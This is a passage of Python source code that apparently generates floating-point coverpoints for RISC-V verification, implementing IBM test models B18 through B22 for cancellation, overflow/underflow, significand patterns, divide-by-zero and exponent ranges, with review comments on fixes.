    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Implementation:
        - Firstly, cancellation using the B3 model as base is performed (LSB/Guard/Sticky enumeration over the subnormal and normal operand lists).
        - The next dataset is the replica of the B4 model which takes into account overflow values for guard, round and sticky bits.
        - The final dataset is obtained from the B5 model; underflow values are built in decimal format.
        - The operand values are calculated from the intermediate-result dataset (see _ibm_b18_operands) and then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with rounding mode "0" for that particular opcode.
    '''
    opcode = opcode.split('.')[0]
    getcontext().prec = 40
    if seed == -1:
        # Deterministic per-opcode seed keeps generated coverpoints reproducible.
        if opcode in 'fmadd':
            random.seed(0)
        elif opcode in 'fnmadd':
            random.seed(1)
        elif opcode in 'fmsub':
            random.seed(2)
        elif opcode in 'fnmsub':
            random.seed(3)
    else:
        random.seed(seed)

    # --- Dataset 1: cancellation of B3 (LSB / Guard / Sticky enumeration) ---
    if flen == 32:
        maxnum = float.fromhex('0x1.7fffffp+127')
        ieee754_num = []
        lsb = []
        for i in fsubnorm+fnorm:
            # Record the LSB (parity of the last hex digit) twice: once for the
            # positive and once for the negative variant appended below.
            if int(i[-1],16)%2 == 1:
                lsb.append('1')
                lsb.append('1')
            else:
                lsb.append('0')
                lsb.append('0')
            float_val = float.hex(fields_dec_converter(32,i))
            if float_val[0] != '-':
                ieee754_num.append(float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
                ieee754_num.append('-'+float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
            else:
                ieee754_num.append(float_val.split('p')[0][0:11]+'p'+float_val.split('p')[1])
                ieee754_num.append(float_val.split('p')[0][1:11]+'p'+float_val.split('p')[1])
        ir_dataset = []
        for k in range(len(ieee754_num)):
            # Append an extra hex digit i = GRS0 to enumerate guard/sticky bits.
            for i in range(2,16,2):
                grs = '{:04b}'.format(i)
                if ieee754_num[k][0] == '-': sign = '1'
                else: sign = '0'
                ir_dataset.append([ieee754_num[k].split('p')[0]+str(i)+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Sticky = '+grs[2]+' Sign = '+sign+' LSB = '+lsb[k] + ': Multiply add - Guard & Sticky Cancellation'])
        for i in range(len(ir_dataset)):
            ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
    elif flen == 64:
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        ieee754_num = []
        lsb = []
        for i in dsubnorm+dnorm:
            if int(i[-1],16)%2 == 1:
                lsb.append('1')
                lsb.append('1')
            else:
                lsb.append('0')
                lsb.append('0')
            float_val = str(fields_dec_converter(64,i))
            if float_val[0] != '-':
                ieee754_num.append(float_val)
                ieee754_num.append('-'+float_val)
            else:
                ieee754_num.append(float_val)
                ieee754_num.append(float_val[1:])
        ir_dataset = []
        for k in range(len(ieee754_num)):
            for i in range(2,16,2):
                grs = '{:04b}'.format(i)
                if ieee754_num[k][0] == '-': sign = '1'
                else: sign = '0'
                # Perturb the decimal significand to emulate guard/sticky bits.
                ir_dataset.append([str(Decimal(ieee754_num[k].split('e')[0])+Decimal(pow(i*16,-14)))+'e'+ieee754_num[k].split('e')[1],' | Guard = '+grs[0]+' Sticky = '+grs[2]+' Sign = '+sign+' LSB = '+lsb[k] + ': Multiply add - Guard & Sticky Cancellation'])
    b18_comb = []
    _ibm_b18_operands(flen, opcode, maxnum, ir_dataset, b18_comb)
    ir_dataset1 = ir_dataset

    # --- Dataset 2: cancellation of B4 (overflow neighbourhood of maxnorm) ---
    if flen == 32:
        ieee754_maxnorm_p = '0x1.7fffffp+127'
        ieee754_maxnorm_n = '0x1.7ffffep+127'
        maxnum = float.fromhex(ieee754_maxnorm_p)
        ir_dataset = []
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([ieee754_maxnorm_p.split('p')[0]+str(i)+'p'+ieee754_maxnorm_p.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Overflow Cancellation'])
            ir_dataset.append([ieee754_maxnorm_n.split('p')[0]+str(i)+'p'+ieee754_maxnorm_n.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm - '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Overflow Cancellation'])
        for i in range(len(ir_dataset)):
            ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
    elif flen == 64:
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        maxdec_p = str(maxnum)
        maxdec_n = str(float.fromhex('0x1.ffffffffffffep+1023'))
        ir_dataset = []
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(maxdec_p.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+maxdec_p.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Overflow Cancellation'])
            ir_dataset.append([str(Decimal(maxdec_n.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+maxdec_n.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm - '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Overflow Cancellation'])
    _ibm_b18_operands(flen, opcode, maxnum, ir_dataset, b18_comb)
    ir_dataset2 = ir_dataset

    # --- Dataset 3: cancellation of B5 (underflow neighbourhood of minsubnorm/minnorm) ---
    if flen == 32:
        maxnum = float.fromhex('0x1.7fffffp+127')
        ieee754_minsubnorm = '0x0.000001p-126'
        ir_dataset = []
        for i in range(0,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([ieee754_minsubnorm.split('p')[0]+str(i)+'p'+ieee754_minsubnorm.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minsubnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Underflow Cancellation'])
        ieee754_minnorm = '0x1.000000p-126'
        for i in range(0,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([ieee754_minnorm.split('p')[0]+str(i)+'p'+ieee754_minnorm.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Underflow Cancellation'])
        n = len(ir_dataset)
        # Convert to floats in place and mirror each entry with its negation.
        for i in range(n):
            ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
            ir_dataset.append([-1*ir_dataset[i][0],ir_dataset[i][1]])
    elif flen == 64:
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        minsubdec = '5e-324'
        ir_dataset = []
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(minsubdec.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+minsubdec.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minsubnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Underflow Cancellation'])
        minnormdec = '2.2250738585072014e-308'
        ir_dataset.append([minsubdec, ' | Guard = 0 Round = 0 Sticky = 0 --> Minsubnorm + 0 ulp'])
        ir_dataset.append([minnormdec,' | Guard = 0 Round = 0 Sticky = 0 --> Minnorm + 0 ulp'])
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(minnormdec.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+minnormdec.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minnorm + '+str(int(grs[0:3],2))+' ulp' + ': Multiply add - Underflow Cancellation'])
        n = len(ir_dataset)
        # Mirror each decimal-string entry with its negation.
        for i in range(n):
            ir_dataset.append(['-'+ir_dataset[i][0],ir_dataset[i][1]])
    _ibm_b18_operands(flen, opcode, maxnum, ir_dataset, b18_comb)
    ir_dataset3 = ir_dataset

    # Comments are looked up positionally, so keep dataset order aligned with b18_comb.
    ir_dataset = ir_dataset1 + ir_dataset2 + ir_dataset3
    coverpoints = []
    k = 0
    for c in b18_comb:
        cvpt = ""
        for x in range(1, ops+1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += ir_dataset[k][1]
        coverpoints.append(cvpt)
        k = k+1
    mess = 'Generated' + (' '*(5-len(str(len(coverpoints))))) + str(len(coverpoints)) + ' ' + \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B18 for ' + opcode + ' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def _split_sig_exp(value):
    """Split a float's decimal repr into (significand, exponent) strings.

    Returns ('0', '0') for zero. If the repr carries no 'e' (small-magnitude
    floats print as plain decimals), the whole repr is the significand and the
    exponent is '0' — this guards the IndexError the bare split('e')[1] would
    raise in that case.
    """
    if value == 0:
        return '0', '0'
    text = str(value)
    if 'e' in text:
        sig, exp = text.split('e')
        return sig, exp
    return text, '0'

def ibm_b19(flen, opcode, ops, seed=-1):
    '''
    IBM Model B19 Definition:
        This model checks various possible differences between the two inputs.
        A test-case will be created for each combination of the following table::

            First input    Second input    Difference between exponents    Difference between significands
            +Normal        +Normal         >0                              >0
            -Normal        -Normal         =0                              =0
            +SubNormal     +SubNormal      <0                              <0
            -SubNormal     -SubNormal
            0              0

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Operand1 {operation} Operand2 = Derived from the table above

    Implementation:
        - Normal (positive and negative), subnormal (positive and negative) arrays are randomly initialized within their respectively declared ranges.
        - The difference between exponents and significands are formed as per the conditions in the table by mixing the significand of one number with the exponent of the other.
        - All possible combinations of the table are used in creating the test-cases.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with the rounding mode assigned to that particular opcode.
    '''
    opcode = opcode.split('.')[0]
    getcontext().prec = 40
    if flen == 32:
        maxnum = float.fromhex('0x1.7fffffp+127')
        minsubnorm = float.fromhex('0x0.000001p-126')
        maxsubnorm = float.fromhex('0x0.7fffffp-126')
    elif flen == 64:
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        minsubnorm = float.fromhex('0x0.0000000000001p-1022')
        maxsubnorm = float.fromhex('0x0.fffffffffffffp-1022')
    if seed == -1:
        # Deterministic per-opcode seed keeps generated coverpoints reproducible.
        if opcode in 'fmin':
            random.seed(0)
        elif opcode in 'fmax':
            random.seed(1)
        elif opcode in 'flt':
            random.seed(2)
        elif opcode in 'feq':
            random.seed(3)
        elif opcode in 'fle':
            # NOTE(review): shares seed 3 with 'feq' — confirm whether a
            # distinct seed (4) was intended.
            random.seed(3)
    else:
        random.seed(seed)
    b19_comb = []
    comment = []
    normal = []
    normal_neg = []
    sub_normal = []
    sub_normal_neg = []
    zero = [[0e0,'Zero']]
    for i in range(5):
        normal.append([random.uniform(1,maxnum),'Normal'])
        normal_neg.append([random.uniform(-1*maxnum,-1),'-Normal'])
        sub_normal.append([random.uniform(minsubnorm,maxsubnorm),'Subnormal'])
        sub_normal_neg.append([random.uniform(-1*maxsubnorm,-1*minsubnorm),'-Subnormal'])
    all_num = normal + normal_neg + sub_normal + sub_normal_neg + zero
    for i in all_num:
        for j in all_num:
            i_sig, i_exp = _split_sig_exp(i[0])
            j_sig, j_exp = _split_sig_exp(j[0])
            if float(i_sig) >= float(j_sig): sig_sign = '>='
            else: sig_sign = '<'
            if float(i_exp) >= float(j_exp): exp_sign = '>='
            else: exp_sign = '<'
            # Mix significands and exponents of the pair to realise every
            # significand/exponent difference relation from the table.
            rs1 = float(i_sig+'e'+i_exp)
            rs2 = float(j_sig+'e'+j_exp)
            b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
            comment.append(' | rs1 --> ' + i[1] + ', rs2 --> ' + j[1] + ', rs1_significand ' + sig_sign + ' rs2_significand' + ', rs1_exp ' + exp_sign + ' rs2_exp')
            rs1 = float(i_sig+'e'+j_exp)
            rs2 = float(j_sig+'e'+i_exp)
            b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
            comment.append(' | rs1 --> ' + j[1] + ', rs2 --> ' + i[1] + ', rs1_significand ' + sig_sign + ' rs2_significand' + ', rs2_exp ' + exp_sign + ' rs1_exp')
            rs1 = float(j_sig+'e'+i_exp)
            rs2 = float(i_sig+'e'+j_exp)
            b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
            comment.append(' | rs1 --> ' + j[1] + ', rs2 --> ' + i[1] + ', rs2_significand ' + sig_sign + ' rs1_significand' + ', rs1_exp ' + exp_sign + ' rs2_exp')
            rs1 = float(i_sig+'e'+j_exp)
            rs2 = float(j_sig+'e'+j_exp)
            b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
            comment.append(' | rs1 --> ' + j[1] + ', rs2 --> ' + j[1] + ', rs1_significand ' + sig_sign + ' rs2_significand' + ', rs1_exp = rs2_exp')
            rs1 = float(i_sig+'e'+i_exp)
            rs2 = float(i_sig+'e'+j_exp)
            b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
            comment.append(' | rs1 --> ' + i[1] + ', rs2 --> ' + j[1] + ', rs1_significand = rs2_significand' + ', rs1_exp ' + exp_sign + ' rs2_exp')
            rs1 = float(i_sig+'e'+i_exp)
            rs2 = float(i_sig+'e'+i_exp)
            b19_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
            comment.append(' | rs1 --> ' + i[1] + ', rs2 --> ' + i[1] + ', rs1_significand = rs2_significand, rs1_exp = rs2_exp')
    coverpoints = []
    k = 0
    for c in b19_comb:
        cvpt = ""
        for x in range(1, 3):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        # Rounding mode chosen per opcode group.
        if opcode in ["fadd","fsub","fmul","fdiv","fsqrt","fmadd","fnmadd","fmsub","fnmsub","fcvt","fmv","fle","fmv","fmin","fsgnj"]:
            cvpt += 'rm_val == 0'
        elif opcode in ["fclass","flt","fmax","fsgnjn"]:
            cvpt += 'rm_val == 1'
        elif opcode in ["feq","flw","fsw","fsgnjx"]:
            cvpt += 'rm_val == 2'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += comment[k]
        coverpoints.append(cvpt)
        k += 1
    mess = 'Generated' + (' '*(5-len(str(len(coverpoints))))) + str(len(coverpoints)) + ' ' + \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B19 for ' + opcode + ' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b20(flen, opcode, ops, seed=-1):
    '''
    IBM Model B20 Definition:
        This model will create test-cases such that the significand of the intermediate results will cover each of the following patterns:
        Mask on the intermediate result significand (excluding the leading "1"):

        .. code-block::

                xxx...xxx10
                xxx...xx100
                xxx...x1000
                ...
                xx1...00000
                x10...00000
                100...00000
                000...00000

        The sticky bit of the intermediate result should always be 0. In case of the remainder operation, we will look at the result of the division in order to find the interesting test-cases.

        Operation: Divide, Square-root.

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Intermediate Results = [Random bits are taken initially to form xxx...xxx10. The pattern described above is then formed]
        Operand1 {operation} Operand2 = Intermediate Results

    Implementation:
        - A loop is initiated where random bits are obtained for which the subsequent sign, exponent is calculated for the intermediate value and stored in the ir_dataset.
        - Operand 1 (rs1) is randomly initialized in the range (1, limnum) and the subsequent operator value is found.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    opcode = opcode.split('.')[0]
    getcontext().prec = 60
    # Deterministic per-opcode seeding when the caller supplies no seed.
    if seed == -1:
        if opcode in 'fdiv':
            random.seed(1)
        elif opcode in 'fsqrt':
            random.seed(2)
    else:
        random.seed(seed)
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        limnum = maxnum
        ir_dataset = []
        # Patterns X..X10..0: i random bits, a single '1', then only zeros
        # (guarantees a sticky bit of 0 in the intermediate result).
        for i in range(1,21,1):
            for k in range(5):
                bits = random.getrandbits(i)
                bits = bin(bits)[2:]
                front_zero = i-len(bits)
                bits = '0'*front_zero + bits
                trailing_zero = 22-i
                sig = bits+'1'+'0'*trailing_zero
                exp = random.getrandbits(8)         # binary32 exponent field: 8 bits
                exp = '{:08b}'.format(exp)
                sgn = random.getrandbits(1)
                sgn = '{:01b}'.format(sgn)
                ir_bin = ('0b'+sgn+exp+sig)
                # The prepended '1' guard digit stops hex() from eating leading zeros.
                ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
                ir_dataset.append([ir, ' | Intermediate result significand: ' + sig + ' Pattern: ' + 'X'*i + '1' + '0'*trailing_zero])
        # Boundary pattern 100...0
        sig = '1'+'0'*22
        exp = random.getrandbits(8)
        exp = '{:08b}'.format(exp)
        sgn = random.getrandbits(1)
        sgn = '{:01b}'.format(sgn)
        ir_bin = ('0b'+sgn+exp+sig)
        ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
        ir_dataset.append([ir, 'Intermediate result significand: '+ sig + ' Pattern: ' + '1' + '0'*22])
        # Boundary pattern 000...0
        sig = '0'*23
        exp = random.getrandbits(8)
        exp = '{:08b}'.format(exp)
        sgn = random.getrandbits(1)
        sgn = '{:01b}'.format(sgn)
        ir_bin = ('0b'+sgn+exp+sig)
        ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
        ir_dataset.append([ir, 'Intermediate result significand: '+ sig + ' Pattern: ' + '0' + '0'*22])
    elif flen == 64:
        ieee754_limnum = '0x1.fffffffffffffp+507'
        limnum = float.fromhex(ieee754_limnum)
        ir_dataset = []
        for i in range(1,50,1):
            for k in range(5):
                bits = random.getrandbits(i)
                bits = bin(bits)[2:]
                front_zero = i-len(bits)
                bits = '0'*front_zero + bits
                trailing_zero = 51-i
                sig = bits+'1'+'0'*trailing_zero
                exp = random.getrandbits(11)        # binary64 exponent field: 11 bits
                exp = '{:011b}'.format(exp)
                sgn = random.getrandbits(1)
                sgn = '{:01b}'.format(sgn)
                ir_bin = ('0b'+sgn+exp+sig)
                ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
                ir_dataset.append([ir, ' | Intermediate result significand: ' + sig + ' Pattern: ' + 'X'*i + '1' + '0'*trailing_zero])
        # Boundary pattern 100...0
        sig = '1'+'0'*51
        exp = random.getrandbits(11)    # FIX: was getrandbits(8) — binary64 exponent is 11 bits,
        exp = '{:011b}'.format(exp)     # an 8-bit field produced a malformed 61-bit encoding
        sgn = random.getrandbits(1)
        sgn = '{:01b}'.format(sgn)
        ir_bin = ('0b'+sgn+exp+sig)
        ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
        ir_dataset.append([ir, 'Intermediate result significand: '+ sig + ' Pattern: ' + '1' + '0'*51])
        # Boundary pattern 000...0
        sig = '0'*52
        exp = random.getrandbits(11)    # FIX: was getrandbits(8) — see note above
        exp = '{:011b}'.format(exp)
        sgn = random.getrandbits(1)
        sgn = '{:01b}'.format(sgn)
        ir_bin = ('0b'+sgn+exp+sig)
        ir = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
        # FIX: pattern text now has 52 digits, matching the 52-bit significand
        # (previously printed 53 zeros).
        ir_dataset.append([ir, 'Intermediate result significand: ' + sig + ' Pattern: ' + '0' + '0'*51])
    b8_comb = []
    for i in range(len(ir_dataset)):
        # Derive the operand(s) that yield the desired intermediate result.
        rs1 = random.uniform(1, limnum)
        if opcode in 'fdiv':
            if flen == 32:
                rs2 = rs1/ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
        elif opcode in 'fsqrt':
            if flen == 32:
                rs2 = ir_dataset[i][0]*ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
        if(flen==32):
            # NOTE(review): x1/x2 are never read afterwards, but struct.pack('f', ...)
            # raises OverflowError for values outside float32 range, so removing these
            # lines would change error behaviour — confirm before cleaning up.
            x1 = struct.unpack('f', struct.pack('f', rs1))[0]
            x2 = struct.unpack('f', struct.pack('f', rs2))[0]
        elif(flen==64):
            x1 = rs1
            x2 = rs2
        if opcode in ['fdiv']:
            b8_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
        elif opcode in 'fsqrt':
            # fsqrt takes a single operand: only the squared value is emitted.
            b8_comb.append((floatingPoint_tohex(flen,float(rs2)),))
    coverpoints = []
    k=0
    for c in b8_comb:
        cvpt = ""
        for x in range(1, ops+1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += ir_dataset[k][1]
        coverpoints.append(cvpt)
        k += 1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B20 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b21(flen, opcode, ops):
    '''
    IBM Model B21 Definition:
        Exercises the Divide-By-Zero exception flag: for divide/remainder, one
        test case is generated per combination of operand classes drawn from
        {0, random non-zero number, Infinity, NaN} for each operand.

        Operation: Divide, Remainder

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode

    :type flen: int
    :type opcode: str
    :type ops: int

    Abstract Dataset Description:
        Final Results = [ Zero, Subnorm, Norm, Infinity, DefaultNaN, QNaN, SNaN ]

    Implementation:
        - Accumulate the basic_types pool per flen, then take the full cross
          product over `ops` operand slots with itertools.product.
        - Each operand is expanded into its sign/exponent/mantissa fields via
          extract_fields, and a human-readable value comment is appended.
    '''
    if flen == 32:
        basic_types = (fzero + fsubnorm + fnorm + finfinity + fdefaultnan
                       + [fqnan[0], fqnan[3]] + [fsnan[0], fsnan[3]])
    elif flen == 64:
        basic_types = (dzero + dsubnorm + dnorm + dinfinity + ddefaultnan
                       + [dqnan[0], dqnan[1]] + [dsnan[0], dsnan[1]])
    else:
        logger.error('Invalid flen value!')
        sys.exit(1)
    # Full cross product: one pool copy per operand slot.
    b21_comb = list(itertools.product(*ops*[basic_types]))
    coverpoints = []
    for operands in b21_comb:
        cvpt = ''.join(extract_fields(flen, operands[idx - 1], str(idx)) + ' and '
                       for idx in range(1, ops + 1))
        # Only fdiv pins the rounding mode; other opcodes leave it unconstrained.
        if opcode.split('.')[0] in ["fdiv"]:
            cvpt += 'rm_val == 0'
        cvpt += ' # '
        value_notes = []
        for idx in range(1, ops + 1):
            operand = operands[idx - 1]
            value_notes.append('rs' + str(idx) + '_val=='
                               + num_explain(flen, operand) + '(' + str(operand) + ')')
        cvpt += ' and '.join(value_notes)
        coverpoints.append(cvpt)
    mess = ('Generated' + ' '*(5-len(str(len(coverpoints)))) + str(len(coverpoints))
            + ' ' + (str(32) if flen == 32 else str(64))
            + '-bit coverpoints using Model B21 for ' + opcode + ' !')
    logger.info(mess)
    return comments_parser(coverpoints)
def ibm_b22(flen, opcode, ops, seed=10):
    '''
    IBM Model B22 Definition:
        This model creates test cases for each of the following exponents (unbiased):

        1. Smaller than -3
        2. All the values in the range [-3, integer width+3]
        3. Larger than integer width + 3

        For each exponent two cases will be randomly chosen, positive and negative.

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Operand1 = [Smaller than -3, All the values in the range [-3, integer width+3], Larger than integer width + 3]

    Implementation:
        - Random significand bits are generated and combined with each biased
          exponent in the in-range case; the below-range and above-range cases
          pick a single random exponent each.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with rounding mode 0 for that particular opcode.
    '''
    opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
    # NOTE(review): for two-part opcodes like 'fcvt.w', opcode[2] is never 's'/'d',
    # so these overrides appear ineffective — confirm intended behaviour.
    if opcode[2] == 's': flen = 32
    elif opcode[2] == 'd': flen = 64
    getcontext().prec = 40
    # Destination integer width, used to bound the exponent ranges.
    xlen = 0
    if opcode in 'fcvt.w':
        xlen = 32
    elif opcode in 'fcvt.l':
        xlen = 64
    elif opcode in 'fcvt.wu':
        xlen = 32
    elif opcode in 'fcvt.lu':
        xlen = 64
    # Deterministic per-opcode seeding when the caller supplies no seed.
    if seed == -1:
        if opcode in 'fcvt.w':
            random.seed(0)
        elif opcode in 'fcvt.l':
            random.seed(1)
        elif opcode in 'fcvt.wu':
            random.seed(2)
        elif opcode in 'fcvt.lu':
            random.seed(3)
    else:
        random.seed(seed)
    b22_comb = []
    if flen == 32:
        op_dataset = []
        # Case 2: every biased exponent in [124, xlen+130] i.e. unbiased [-3, xlen+3].
        # FIX: upper bound was xlen+130 (exclusive), which stopped at xlen+2 and
        # mislabelled xlen+3 as "greater than (integer width+3)" below.
        for i in range(124,xlen+131,1):
            bits = random.getrandbits(23)
            bits = bin(bits)[2:]
            front_zero = 23-len(bits)
            sig = '0'*front_zero + bits
            exp = i
            exp = '{:08b}'.format(exp)
            sgn = random.getrandbits(1)
            sgn = '{:01b}'.format(sgn)
            ir_bin = ('0b'+sgn+exp+sig)
            # The prepended '1' guard digit stops hex() from eating leading zeros.
            op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
            op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-127) + ', Exponent in the range [-3, integer width+3]'])
            b22_comb.append((floatingPoint_tohex(flen,float(op)),))
        # Case 1: one random biased exponent below 124 (unbiased < -3).
        bits = random.getrandbits(23)
        bits = bin(bits)[2:]
        front_zero = 23-len(bits)
        sig = '0'*front_zero + bits
        exp = random.randint(0,124)
        exp = '{:08b}'.format(exp)
        sgn = random.getrandbits(1)
        sgn = '{:01b}'.format(sgn)
        ir_bin = ('0b'+sgn+exp+sig)
        op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
        op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-127) + ', Exponent less than -3'])
        b22_comb.append((floatingPoint_tohex(flen,float(op)),))
        # Case 3: one random biased exponent above xlen+130 (unbiased > xlen+3).
        # FIX: lower bound was xlen+130 (= unbiased xlen+3), which belongs to case 2.
        bits = random.getrandbits(23)
        bits = bin(bits)[2:]
        front_zero = 23-len(bits)
        sig = '0'*front_zero + bits
        exp = random.randint(xlen+131,255)
        exp = '{:08b}'.format(exp)
        sgn = random.getrandbits(1)
        sgn = '{:01b}'.format(sgn)
        ir_bin = ('0b'+sgn+exp+sig)
        op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
        op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-127) + ', Exponent greater than (integer width+3)'])
        b22_comb.append((floatingPoint_tohex(flen,float(op)),))
    elif flen == 64:
        op_dataset = []
        # Case 2: unbiased exponents [-3, xlen+3] (bias 1023).
        # FIX: upper bound was xlen+1026 (exclusive) — same off-by-one as above.
        for i in range(1020,xlen+1027,1):
            bits = random.getrandbits(52)
            bits = bin(bits)[2:]
            front_zero = 52-len(bits)
            sig = '0'*front_zero + bits
            exp = i
            exp = '{:011b}'.format(exp)
            sgn = random.getrandbits(1)
            sgn = '{:01b}'.format(sgn)
            ir_bin = ('0b'+sgn+exp+sig)
